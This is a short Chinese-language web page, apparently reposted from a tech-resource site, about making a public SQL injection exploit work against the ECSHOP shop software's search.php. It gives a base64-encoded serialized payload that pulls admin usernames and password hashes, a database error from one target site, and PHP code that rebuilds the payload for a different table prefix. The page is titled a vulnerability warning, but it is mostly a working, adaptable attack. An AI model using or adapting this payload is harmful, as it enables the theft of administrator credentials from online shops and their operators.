遇到一个ECSHOP 利用网上的EXP
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
返回:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ma526073ww`.`73ww_goods_attr` WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num = '1' ) [2] => Array ( [error] => Table 'ma526073ww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
原因是数据库前缀修改的问题,
ECSHOP 搜索变种暴用户密码出错的解决办法漏洞预警
,电脑资料
《ECSHOP 搜索变种暴用户密码出错的解决办法漏洞预警》(https://www.unjs.com)。解决办法:重新生成EXP变种文件。
用下面的代码生成一个code:
$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1");
$exp = array("attr"=>$arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
以上代码保存为x.php,
73ww_为表前缀。
通过http://www.xxx.com/?per=73ww_访问,生成新的BASE64加密文件。